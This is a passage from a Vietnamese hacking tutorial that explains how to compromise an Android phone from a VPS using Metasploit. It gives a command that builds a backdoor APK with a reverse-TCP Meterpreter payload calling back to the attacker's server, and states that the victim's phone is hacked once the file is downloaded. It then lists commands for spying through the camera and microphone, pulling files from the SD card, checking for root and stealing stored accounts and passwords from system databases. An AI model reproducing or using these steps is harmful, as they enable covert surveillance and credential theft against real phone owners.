II. Làm trên trên môi trường VPS
3. Từ VPS xâm nhập vào thiết bị Android
a. Các bước thực hiện
Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang LAN với địa chỉ IP là địa chỉ của VPS
Chúng ta vẫn sử dụng lệnh
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk
Ở đây địa chỉ VPS là 14.0.21.132
Khởi động Metasploit Console trên VPS
Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử dụng chính IP của VPS
Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị hack
Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ
Để xem thông tin về máy, nhập lệnh sysinfo
Để xem các tác vụ đang chạy gõ ps
Xem ip gõ ifconfig
Xem danh sách thư mục, file gõ ls Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước.
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Lấy file từ sd card
Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư mục
Dùng lệnh cd /sdcard/Download để vào thư mục
Để tải về máy, ta nhập lệnh Download App.apk
Để upload gõ lệnh upload
Và file này sẽ được tải về thư mục root của máy Kali Gõ shell để vào lệnh
kiểm tra xem có root chưa gõ
su whoami
Nếu báo unknown id is 0 tức là đã root ls -l danh mục file và các quyền
cd để chuyển hướng thư mục
Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/
để xem danh sách và down load các file hay thay đổi các file trong ROM đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data
Ctrl + C để quay lại